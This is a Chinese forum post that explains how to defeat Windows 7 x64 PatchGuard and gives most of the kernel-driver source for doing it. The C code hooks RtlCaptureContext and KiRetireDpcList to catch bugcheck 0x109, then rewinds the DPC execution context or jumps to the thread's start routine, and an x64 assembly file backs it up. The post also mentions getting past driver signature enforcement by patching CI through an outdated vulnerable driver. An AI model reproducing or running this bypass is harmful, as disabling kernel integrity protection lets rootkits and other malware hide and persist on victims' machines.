过Patchguard的梗 附相关驱动源码

海军上将

     这里我研究的问题只有Patchguard怎么让丫去死，至于DSE这种东西，随便找个过时的有任意代码执行问题的驱动（比如DCR，VBOX，金山某士）去Patch一下CI就可以了。今天我也不是来跟人分享VMX或者patch文件那些无功夫的过PG手法。

　　我今天要做的是继续以前老外的pg的梗（由于我的笔记本跑win8不能10秒开机，所以只能用win7来撸）。

　　老外有几篇关于PG攻击的文章：
　　http://www.mcafee.com/in/resourc ... ting-patchguard.pdf
　　http://www.uninformed.org/?v=3&a=3&t=sumry
　　http://www.uninformed.org/?v=8&a=5&t=sumry
　　http://www.zer0mem.sk/?p=271
　　
　　不过统统不能解决真正的问题，最后一个连接除外。不过其中的分析让我们知道两件事儿，第一件事儿是PG的蓝屏是通过DPC或者TIMER调用KeBugCheckEx来的。第二件事儿是PG调用KeBugCheckEx的时候，会恢复KeBugCheckEx上的修改。

　　通过读老外的文章我们知道通过DPC来的必须经过KiRetireDpcList这个玩意才能到达蓝屏（而通过TIMER来的经过的函数比较奇怪，这里也不想管他）。

　　老外有一个思路就是hook KeBugCheckEx来处理TIMER的PG引发的0x109蓝屏，但是因为KeBugCheckEx有恢复hook的可能（新的PG是复制了BugCheck的代码），所以我选择了一个KeBugCheckEx内部的调用的函数来进行挂钩，然后通过堆栈读出RCX判断一下错误号，这个调用函数也是老外早就提供好的就是RtlCaptureContext。
　　
　　到这里我都和老外的思路近似，之后后面就不一样了。我只有2个hook点，我不想判断DPC是不是PG的，也不研究线程TIMER的枚举，我直接在KiRetireDpcList这里保存运行环境（CONTEXT），然后继续调用KiRetireDpcList代码，然后保存的恢复运行环境（RIP修好）。

　　如果发生了0x109蓝屏，那么经过我挂钩的RtlCaptureContext时，我主动插入一个DPC到DPC链条去，然后恢复保存的CONTEXT到Call KiRetireDpcList处的去重新执行的话（也就是说，把时光倒流了），这时候PG就无法蓝屏了。但是这里有一个小问题，如果来自线程TIMER的PG蓝屏，则不能开蜘蛛的大招 回到过去 去Pass掉TIMER。不过windows的机制让我知道如果在pg的timer里的时候，IRQL应该是PASSIVE级别的，在PASSIVE级别的话，可以将整个执行流程跳入线程开始去直接运行（这点是老外的资料里发现然后结合windbg调试出来的）。
　　
　　那么我绕过PG的工具设计思路就是：

1. //有2个hook点！
   
2. //RtlCaptureContext-->保存ecx等物-->OrgCap-->ProcPatchGuard-->其他
   
3. //                                          -->ECX==109 ,来自BugCheck-->修复STACK，重新插入空DPC
   
4. //                                                                      -->如果IRQL是PASSIVE,则CallPointer去
   
5. //                                                                      -->不是PASSIVE,则恢复环境-->到KiRetireDpcList重新执行DPC序列
   
6. //KiRetireDpcList -->保存环境-->原始-->还原环境

复制代码

处理PG的主逻辑核心代码：hook库请自行准备了，至于KiRetireDpcList的定位，我是用符号文件定位的，其实也可以通过注册一个DPC去做回溯得到。

1. 
   
2. #include "stdafx.h"
   
3. 
   
4. typedef struct _HOOK_CTX
   
5. {
   
6.     ULONG64 rax;                 
   
7.     ULONG64 rcx;
   
8.     ULONG64 rdx;               
   
9.     ULONG64 rbx;               
   
10.     ULONG64 rbp;
    
11.     ULONG64 rsi;                 
    
12.     ULONG64 rdi;
    
13.     ULONG64 r8;                  
    
14.     ULONG64 r9;
    
15.     ULONG64 r10;                 
    
16.     ULONG64 r11;
    
17.     ULONG64 r12;                 
    
18.     ULONG64 r13;
    
19.     ULONG64 r14;                 
    
20.     ULONG64 r15;
    
21.     ULONG64 Rflags;
    
22.     ULONG64 rsp;
    
23. }HOOK_CTX,*PHOOK_CTX;
    
24. 
    
25. typedef VOID (*TRtlCaptureContext)(PCONTEXT ContextRecord);
    
26. 
    
27. extern VOID AdjustStackCallPointer(
    
28.     IN ULONG_PTR NewStackPointer,
    
29.     IN PVOID StartAddress,
    
30.     IN PVOID Argument);
    
31. 
    
32. extern CHAR GetCpuIndex();
    
33. extern VOID HookKiRetireDpcList();
    
34. extern VOID HookRtlCaptureContext();
    
35. extern VOID BackTo1942();
    
36. static ULONG g_ThreadContextRoutineOffset = 0;
    
37. static ULONG64 g_KeBugCheckExAddress=0;
    
38. static UINT g_MaxCpu=0;
    
39. 
    
40. KDPC  g_TempDpc[0x100];
    
41. ULONG64 g_CpuContextAddress=0;
    
42. ULONG64 g_KiRetireDpcList=0;
    
43. 
    
44. //有2个hook点！
    
45. //RtlCaptureContext-->保存ecx等物-->OrgCap-->ProcPatchGuard-->其他
    
46. //                                          -->ECX==109 ,来自BugCheck-->修复STACK，重新插入空DPC
    
47. //                                                                      -->如果IRQL是PASSIVE,则CallPointer去
    
48. //                                                                      -->不是PASSIVE,则恢复环境-->到KiRetireDpcList重新执行DPC序列
    
49. //KiRetireDpcList -->保存环境-->原始-->还原环境
    
50. 
    
51. HOOK_INFO OrgRtlCaptureContext;
    
52. HOOK_INFO OrgKiRetireDpcList;
    
53. 
    
54. //真心刁！
    
55. VOID
    
56.     PgTempDpc(
    
57.     IN struct _KDPC *Dpc,
    
58.     IN PVOID DeferredContext,
    
59.     IN PVOID SystemArgument1,
    
60.     IN PVOID SystemArgument2
    
61.     )
    
62. {
    
63.     return ;
    
64. }
    
65. VOID OnRtlCaptureContext(PHOOK_CTX hookCtx)
    
66. {
    
67.     ULONG64 Rcx;
    
68.     PCONTEXT pCtx = (PCONTEXT)(hookCtx->rcx);
    
69.     ULONG64 Rip = *(ULONG64 *)(hookCtx->rsp);
    
70.     TRtlCaptureContext OldRtlCaptureContext;
    
71.     OldRtlCaptureContext = (TRtlCaptureContext)OrgRtlCaptureContext.Bridge;
    
72. 
    
73.     OldRtlCaptureContext(pCtx);
    
74. 
    
75.     pCtx->Rsp = hookCtx->rsp+0x08;
    
76.     pCtx->Rip = Rip;
    
77.     pCtx->Rax = hookCtx->rax;
    
78.     pCtx->Rbx = hookCtx->rbx;
    
79.     pCtx->Rcx = hookCtx->rcx;
    
80.     pCtx->Rdx = hookCtx->rdx;
    
81.     pCtx->Rsi = hookCtx->rsi;
    
82.     pCtx->Rdi = hookCtx->rdi;
    
83.     pCtx->Rbp = hookCtx->rbp;
    
84. 
    
85.     pCtx->R8 =   hookCtx->r8;
    
86.     pCtx->R9 =   hookCtx->r9;
    
87.     pCtx->R10    =   hookCtx->r10;
    
88.     pCtx->R11    =   hookCtx->r11;
    
89.     pCtx->R12    =   hookCtx->r12;
    
90.     pCtx->R13    =   hookCtx->r13;
    
91.     pCtx->R14    =   hookCtx->r14;
    
92.     pCtx->R15    =   hookCtx->r15;
    
93. 
    
94. 
    
95.     Rcx = *(ULONG64 *)(hookCtx->rsp+0x48);
    
96.     //一开始存储位置rcx=[rsp+8+30]
    
97.     //call之后就是[rsp+8+30+8]
    
98.      
    
99.     if(Rcx==0x109)
    
100.     {
     
101.         //PG的蓝屏！
     
102.         if (Rip>=g_KeBugCheckExAddress && Rip <=g_KeBugCheckExAddress+0x64)
     
103.         {
     
104.             
     
105.             //来自KeBugCheckEx的蓝屏
     
106.             // 先插入一个DPC
     
107.             //检测IRQL的级别，如果是DPC_LEVEL的，则传说中的回到过去的技术。
     
108.             //如果是普通的，则跳入ThreadContext即可
     
109.             PCHAR CurrentThread = (PCHAR)PsGetCurrentThread();
     
110.             PVOID StartRoutine  = *(PVOID **)(CurrentThread + g_ThreadContextRoutineOffset);
     
111.             PVOID StackPointer  = IoGetInitialStack();
     
112.             CHAR  Cpu = GetCpuIndex();
     
113.             KeInitializeDpc(&g_TempDpc[Cpu],
     
114.                 PgTempDpc,
     
115.                 NULL);
     
116.             KeSetTargetProcessorDpc( &g_TempDpc[Cpu], (CCHAR)Cpu );
     
117.             //KeSetImportanceDpc( &g_TempDpc[Cpu], HighImportance);
     
118.             KeInsertQueueDpc( &g_TempDpc[Cpu], NULL, NULL );
     
119.             if(1){
     
120.                 //应该判断版本再做这个事儿！
     
121.                 PCHAR StackPage = (PCHAR)IoGetInitialStack();
     
122.                  
     
123.                 *(ULONG64 *)StackPage = (((ULONG_PTR)StackPage+0x1000) & 0x0FFFFFFFFFFFFF000);//stack起始的MagicCode，
     
124.                 // 如果没有在win7以后的系统上会50蓝屏
     
125.             }
     
126.             if (KeGetCurrentIrql()!=PASSIVE_LEVEL)
     
127.             {
     
128.                 //时光倒流！
     
129.                 BackTo1942();//回到call KiRetireDpcList去了！
     
130.             }
     
131.             //线程TIMER的直接执行线程去！
     
132.             AdjustStackCallPointer(
     
133.                 (ULONG_PTR)StackPointer - 0x8,
     
134.                 StartRoutine,
     
135.                 NULL);
     
136.         }
     
137.     }
     
138.     return ;
     
139. }
     
140. VOID JmpThreadContext()
     
141. {
     
142.     PCHAR CurrentThread = (PCHAR)PsGetCurrentThread();
     
143.     PVOID StartRoutine  = *(PVOID **)(CurrentThread + g_ThreadContextRoutineOffset);
     
144.     PVOID StackPointer  = IoGetInitialStack();
     
145. 
     
146.     AdjustStackCallPointer(
     
147.         (ULONG_PTR)StackPointer - 0x8,
     
148.         StartRoutine,
     
149.         NULL);
     
150. }
     
151. 
     
152. VOID DisablePatchProtectionSystemThreadRoutine(
     
153.     IN PVOID Nothing)
     
154. {
     
155.     PUCHAR         CurrentThread = (PUCHAR)PsGetCurrentThread();
     
156.     for (g_ThreadContextRoutineOffset = 0;
     
157.         g_ThreadContextRoutineOffset < 0x1000;
     
158.         g_ThreadContextRoutineOffset += 4)
     
159.     {
     
160.         if (*(PVOID **)(CurrentThread +
     
161.             g_ThreadContextRoutineOffset) == (PVOID)DisablePatchProtectionSystemThreadRoutine)
     
162.             break;
     
163.     }
     
164. 
     
165.     if (g_ThreadContextRoutineOffset<0x1000)
     
166.     {
     
167.         g_KeBugCheckExAddress = (ULONG64)GetCALLByName(L"KeBugCheckEx");
     
168.          
     
169.         g_MaxCpu = (UINT)KeNumberProcessors;
     
170. 
     
171.         g_CpuContextAddress = (ULONG64)ExAllocatePool(NonPagedPool,0x200*g_MaxCpu+0x1000);
     
172. 
     
173.         if (!g_CpuContextAddress)
     
174.         {
     
175.             return ;
     
176.         }
     
177.         
     
178.         RtlZeroMemory(g_TempDpc,sizeof(KDPC)*0x100);
     
179.         RtlZeroMemory((PVOID)g_CpuContextAddress,0x200 * g_MaxCpu);
     
180. 
     
181.         HookFunction(pCfgData->_KiRetireDpcList,(ULONG_PTR)HookKiRetireDpcList,&OrgKiRetireDpcList);
     
182.          
     
183.         g_KiRetireDpcList = (ULONG64)(OrgKiRetireDpcList.Bridge);
     
184. 
     
185.         HookFunction((ULONG_PTR)GetCALLByName(L"RtlCaptureContext"),(ULONG_PTR)HookRtlCaptureContext,&OrgRtlCaptureContext);
     
186.     }
     
187. }
     
188. 
     
189. NTSTATUS DisablePatchProtection() {
     
190.     OBJECT_ATTRIBUTES Attributes;
     
191.     NTSTATUS          Status;
     
192.     HANDLE            ThreadHandle = NULL;
     
193. 
     
194.     InitializeObjectAttributes(
     
195.         &Attributes,
     
196.         NULL,
     
197.         OBJ_KERNEL_HANDLE,
     
198.         NULL,
     
199.         NULL);
     
200. 
     
201. 
     
202.     Status = PsCreateSystemThread(
     
203.         &ThreadHandle,
     
204.         THREAD_ALL_ACCESS,
     
205.         &Attributes,
     
206.         NULL,
     
207.         NULL,
     
208.         DisablePatchProtectionSystemThreadRoutine,
     
209.         NULL);
     
210. 
     
211.     if (ThreadHandle)
     
212.         ZwClose(
     
213.         ThreadHandle);
     
214. 
     
215.     return Status;
     
216. }
     
217. VOID InitDisablePatchGuard()
     
218. {
     
219.     DisablePatchProtection();
     
220. }
     

复制代码

汇编代码部分：

1. 
   
2. EXTERN g_CpuContextAddress:QWORD;
   
3. EXTERN OnRtlCaptureContext:PROC;
   
4. EXTERN g_KiRetireDpcList:QWORD;
   
5. 
   
6. .CODE
   
7. public AdjustStackCallPointer
   
8. AdjustStackCallPointer PROC
   
9.     mov rsp, rcx
   
10.     xchg r8, rcx
    
11.     jmp rdx
    
12. AdjustStackCallPointer ENDP
    
13. 
    
14. public GetCpuIndex
    
15. GetCpuIndex PROC
    
16.     mov     al, gs:[52h]
    
17.     movzx   eax, al
    
18.     ret
    
19. GetCpuIndex ENDP
    
20. 
    
21. 
    
22. public RestoreCpuContext
    
23. RestoreCpuContext PROC
    
24.                  push    rax
    
25.                  sub     rsp, 20h
    
26.                  call    GetCpuIndex
    
27.                  add     rsp, 20h
    
28.                  mov     r11, 170h
    
29.                  mul     r11
    
30.                  mov     r11, rax
    
31.                  add     r11, g_CpuContextAddress
    
32.                  pop     rax
    
33.                  mov     rsp, [r11+48h]
    
34.                  mov     rbx, [r11+40h]
    
35.                  mov     [rsp+0], rbx
    
36.                  movdqa  xmm0, xmmword ptr [r11+50h]
    
37.                  movdqa  xmm1, xmmword ptr [r11+60h]
    
38.                  movdqa  xmm2, xmmword ptr [r11+70h]
    
39.                  movdqa  xmm3, xmmword ptr [r11+80h]
    
40.                  movdqa  xmm4, xmmword ptr [r11+90h]
    
41.                  movdqa  xmm5, xmmword ptr [r11+0A0h]
    
42.                  movdqa  xmm6, xmmword ptr [r11+0B0h]
    
43.                  movdqa  xmm7, xmmword ptr [r11+0C0h]
    
44.                  movdqa  xmm8, xmmword ptr [r11+0D0h]
    
45.                  movdqa  xmm9, xmmword ptr [r11+0E0h]
    
46.                  movdqa  xmm10, xmmword ptr [r11+0F0h]
    
47.                  movdqa  xmm11, xmmword ptr [r11+100h]
    
48.                  movdqa  xmm12, xmmword ptr [r11+110h]
    
49.                  movdqa  xmm13, xmmword ptr [r11+120h]
    
50.                  movdqa  xmm14, xmmword ptr [r11+130h]
    
51.                  movdqa  xmm15, xmmword ptr [r11+140h]
    
52.                  mov     rbx, [r11]
    
53.                  mov     rsi, [r11+8]
    
54.                  mov     rdi, [r11+10h]
    
55.                  mov     rbp, [r11+18h]
    
56.                  mov     r12, [r11+20h]
    
57.                  mov     r13, [r11+28h]
    
58.                  mov     r14, [r11+30h]
    
59.                  mov     r15, [r11+38h]
    
60.                  mov     rcx, [r11+150h]
    
61.                  mov     rdx, [r11+158h]
    
62.                  mov     r8, [r11+160h]
    
63.                  mov     r9, [r11+168h]
    
64.                  ret
    
65. RestoreCpuContext ENDP
    
66. 
    
67. public BackTo1942
    
68. BackTo1942 PROC
    
69.                  sub     rsp, 20h ;时光倒流
    
70.                  call    GetCpuIndex
    
71.                  add     rsp, 20h
    
72.                  mov     r11, 170h
    
73.                  mul     r11
    
74.                  mov     r11, rax
    
75.                  add     r11, g_CpuContextAddress
    
76.                  mov     rax, [r11+40h]
    
77.                  sub     rax, 5
    
78.                  mov     [r11+40h], rax  ; 这里直接RIP=RIP-5，也就是回到Call KiXX的5字节指令
    
79.                  jmp     RestoreCpuContext
    
80. BackTo1942 ENDP
    
81. 
    
82. public HookKiRetireDpcList
    
83. HookKiRetireDpcList PROC
    
84.                  push    rcx
    
85.                  push    rdx
    
86.                  push    r8
    
87.                  push    r9
    
88.                  sub     rsp, 20h
    
89.                  call    GetCpuIndex
    
90.                  add     rsp, 20h
    
91.                  pop     r9
    
92.                  pop     r8
    
93.                  pop     rdx
    
94.                  pop     rcx
    
95.                  mov     r11, 170h
    
96.                  mul     r11
    
97.                  add     rax, g_CpuContextAddress ; RAX = g_CpuContext[CpuIndex]
    
98.                  mov     [rax], rbx
    
99.                  mov     [rax+8], rsi
    
100.                  mov     [rax+10h], rdi
     
101.                  mov     [rax+18h], rbp
     
102.                  mov     [rax+20h], r12
     
103.                  mov     [rax+28h], r13
     
104.                  mov     [rax+30h], r14
     
105.                  mov     [rax+38h], r15
     
106.                  movdqa  xmmword ptr [rax+50h], xmm0
     
107.                  movdqa  xmmword ptr [rax+60h], xmm1
     
108.                  movdqa  xmmword ptr [rax+70h], xmm2
     
109.                  movdqa  xmmword ptr [rax+80h], xmm3
     
110.                  movdqa  xmmword ptr [rax+90h], xmm4
     
111.                  movdqa  xmmword ptr [rax+0A0h], xmm5
     
112.                  movdqa  xmmword ptr [rax+0B0h], xmm6
     
113.                  movdqa  xmmword ptr [rax+0C0h], xmm7
     
114.                  movdqa  xmmword ptr [rax+0D0h], xmm8
     
115.                  movdqa  xmmword ptr [rax+0E0h], xmm9
     
116.                  movdqa  xmmword ptr [rax+0F0h], xmm10
     
117.                  movdqa  xmmword ptr [rax+100h], xmm11
     
118.                  movdqa  xmmword ptr [rax+110h], xmm12
     
119.                  movdqa  xmmword ptr [rax+120h], xmm13
     
120.                  movdqa  xmmword ptr [rax+130h], xmm14
     
121.                  movdqa  xmmword ptr [rax+140h], xmm15
     
122.                  mov     [rax+150h], rcx
     
123.                  mov     [rax+158h], rdx
     
124.                  mov     [rax+160h], r8
     
125.                  mov     [rax+168h], r9
     
126.                  mov     r11, [rsp]
     
127.                  mov     [rax+40h], r11
     
128.                  mov     r11, rsp
     
129.                  mov     [rax+48h], r11
     
130.                  lea     rax, RestoreCpuContext
     
131.                  mov     [rsp],rax
     
132.                  jmp     g_KiRetireDpcList
     
133. HookKiRetireDpcList ENDP
     
134. 
     
135. public HookRtlCaptureContext
     
136. HookRtlCaptureContext PROC
     
137.     push rsp
     
138.     pushfq
     
139.     push r15
     
140.     push r14
     
141.     push r13
     
142.     push r12
     
143.     push r11
     
144.     push r10
     
145.     push r9
     
146.     push r8      
     
147.     push rdi
     
148.     push rsi
     
149.     push rbp
     
150.     push rbx
     
151.     push rdx
     
152.     push rcx
     
153.     push rax
     
154.     mov rcx,rsp
     
155.     sub rsp,28h
     
156.     call OnRtlCaptureContext
     
157.     add rsp, 28h   
     
158.     pop rax
     
159.     pop rcx
     
160.     pop rdx
     
161.     pop rbx
     
162.     pop rbp
     
163.     pop rsi
     
164.     pop rdi
     
165.     pop r8
     
166.     pop r9
     
167.     pop r10
     
168.     pop r11
     
169.     pop r12
     
170.     pop r13
     
171.     pop r14
     
172.     pop r15
     
173.     popfq
     
174.     pop rsp
     
175.     ret
     
176. HookRtlCaptureContext ENDP
     
177. END
     

复制代码

为了防止无意义的抄袭和不思考的代码利用者，这里就不提供完整工程了。